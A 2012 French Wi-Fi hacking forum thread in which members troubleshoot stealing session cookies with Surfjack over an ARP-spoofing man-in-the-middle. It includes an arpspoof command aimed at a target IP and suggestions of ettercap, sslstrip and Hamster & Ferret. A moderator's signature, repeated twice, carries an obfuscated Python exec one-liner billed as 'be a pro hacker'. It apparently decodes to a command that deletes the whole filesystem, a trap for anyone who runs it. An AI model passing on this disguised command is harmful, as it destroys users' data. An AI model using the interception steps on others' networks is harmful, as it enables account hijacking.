Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-08-2012 22:04:47

Gargoul
Membre
Inscription : 19-08-2012
Messages : 11

surfjack, question d'encryption ?

Bonsoir a tous !

Jai effectivement suivit le tuto a la lettre, sur mon reseau wifi encrypter en WPA. Mon but etant d'essayer de recuperer mes cookie. Parametrage nickel, man in the middle sur la machine ciblée et surfjack lancer. Connection facebook, gmail, msn, et tout le tinticouinti mais...aucun cookie de reçus, console surfjack vierge sans aucune activiter presente.Je me dit peut alors que google chrome contournerai cette attaque ? je décide d'installer IE mais même problème... je me demande alors si le probléme ne viendrais pas du type d'encryption de mon reseau wifi qui est le wpa ???

Merci !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-08-2012 22:11:37

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : surfjack, question d'encryption ?

Gargoul a écrit :

Parametrage nickel, man in the middle sur la machine ciblée

donc pas de soucis.
Cela vient sûrement de ton utilisation de surfjack.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 21-08-2012 22:51:30

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : surfjack, question d'encryption ?

Surfjack travaille directement à la couche IP (enfin, quelque part entre l'ARP et le TCP, voire au dessus). Donc ça veut dire que la sécurité des couches inférieures n'a aucune importance. La "segmentation" des protocoles réseau se base sur l'abstraction : Surfjack peut se baser sur la couche IP sans savoir ce qu'il y a en dessous. Que ce soit de l'ethernet (câblé), du WiFi, de la 3G (plus complexe à déployer là) ou même du IPoAC, ça ne change rien.

Tout ça pour dire que la sécurité du réseau WiFi n'a aucune influence sur surfjack, dès lors que tu fais déjà partie du même LAN que ta cible. Note qu'il y a un moyen simple de vérifier si tu ne me crois pas, passe ton réseau en OPN et refais le test smile

Par contre je ne vois pas trop où est le problème dans ton cas, mais je connais assez mal surfjack (je travaillais plutôt avec wifizoo à l'époque). Tu peux essayer Hamster & Ferret pour le vol de cookies, tu auras peut-être plus de chance. Une idée au passage : Facebook, Gmail et MSN sont probablement sur des connexions HTTPS, ça par contre ça peut être un problème pour Surfjack wink

Hors Ligne

#4 22-08-2012 14:13:48

Gargoul
Membre
Inscription : 19-08-2012
Messages : 11

Re : surfjack, question d'encryption ?

Effectivement, je n'avais pas du tout penser au SSL hmm il faudrait que j'essaie sur d'autre domaine. Mais du coup en y réfléchissant sa limite le rayon d'action c'est foutu https.

Peut-être que ma commande arpspoof est mauvaise ?

arpspoof -i wlan0 -t 192.168.1.44 192.168.1.21

1.44 = ip Machine ciblée
1.21 =  ip Machine qui host Surfjack

Elle est ok ?

Je vais de suite voir ce que ça donne du coté de Hamster & Ferret, merci Antares.

Dernière modification par Gargoul (22-08-2012 14:17:34)

Hors Ligne

#5 22-08-2012 15:11:36

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : surfjack, question d'encryption ?

une question  = un topic.
pose ta question sur arpspoof dans un autre topic (:

si tu es en MITM tu peux utiliser sslstrip.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#6 22-08-2012 22:29:56

Gargoul
Membre
Inscription : 19-08-2012
Messages : 11

Re : surfjack, question d'encryption ?

spawn a écrit :

une question  = un topic.
pose ta question sur arpspoof dans un autre topic (:

si tu es en MITM tu peux utiliser sslstrip.

Pourquoi recréer un sujet alors que le problème a traiter reste le même ? En plus, pour les membres ce serait plus simple de trouver rapidement une réponse si il ce trouve confronter au même problème...

Sinon je me suis remis au problème de surfjack et j'ai trouver la solution.
J'ai laisser tomber arpspoof pour le remplacer par ettercap et maintenant ça marche du feu de dieu !
peut-être un soucis matériel qui rend incompatible arpspoof...

Je recréer un sujet sur sslstrip car celui ci ne fonctionne pas non plus.

Merci a tous, plus particulierement a antares, tes conseil sont précieux.

Hors Ligne

#7 22-08-2012 22:42:29

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : surfjack, question d'encryption ?

Arpspoof ne fonctionnerait donc plus... Intéressant...
Enfin, faudrait vérifier qu'il ne fonctionne pas, en regardant le cache ARP de la victime (commande "arp -a", l'adresse IP du routeur doit correspondre à la MAC de ta machine attaquante). Je penche pour un problème de cache ARP justement, où la victime connaît déjà l'adresse MAC du routeuret ne la demande pas (elle ignore donc les ARP que tu envoies). Peut-être que l'essai que tu as fait avec Ettercap est tombé juste au bon moment pour pourrir sa table ARP, ou peut-être qu'Ettercap est meilleur que Arpspoof smile
Au passage, il y a un moyen "simple" de vérifier si tu es bien en MITM ou pas : tu lances Wireshark sur la machine attaquante et tu regardes si tu vois passer le trafic de la victime (ça marche aussi avec tcpdump en ligne de commande, plus rapide) wink

Par contre ça me "rassure" (arf !) de voir que Facebook, Gmail & co ne sécurisent toujours pas leurs cookies roll Le MacDonalds-sniffing a encore de beaux jours devant lui...

De rien pour mes "conseils", même si ici ils ne t'ont servi à rien tongue

Hors Ligne

#8 22-08-2012 23:16:50

Gargoul
Membre
Inscription : 19-08-2012
Messages : 11

Re : surfjack, question d'encryption ?

j'ai hormis de préciser que arpspoof ne changer en rien ma table arp sur ma machine attaquer alors qu'avec ettercap c'est tout bon.
Par contre, j'ai pas essayer facebook mais gmail sous surfjack ça passe pas. J'ai tenter sous sslstrip mais ça tourne pas... quand j'aurais un peux de temps je me pencherais plus sérieusement sur le problème.

Hors Ligne

#9 23-08-2012 07:00:41

Caracole
Membre Actif
Inscription : 20-08-2011
Messages : 43

Re : surfjack, question d'encryption ?

Le problème, pour sslstrip, et d'ailleurs je pense que c'est la même chose pour surfjack, c'est qu'il te faut au moins une page en http avant de basculer en https. Donc à mon avis c'est pour cela que ça ne fonctionne pas avec Gmail.

Hors Ligne

#10 23-08-2012 11:38:06

Gargoul
Membre
Inscription : 19-08-2012
Messages : 11

Re : surfjack, question d'encryption ?

Caracole a écrit :

Le problème, pour sslstrip, et d'ailleurs je pense que c'est la même chose pour surfjack, c'est qu'il te faut au moins une page en http avant de basculer en https. Donc à mon avis c'est pour cela que ça ne fonctionne pas avec Gmail.

Ce qui veux dire ?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
7 314 26-09-2016 15:52:41 par ElliotV
3 223 01-08-2016 15:53:54 par Olympe
11 710 05-03-2016 12:51:24 par Jéjé El Dipso
6 967 08-01-2016 19:58:40 par damsss
Question bête surement! par le flibustier
4 559 28-09-2015 19:38:05 par le flibustier

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.023 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]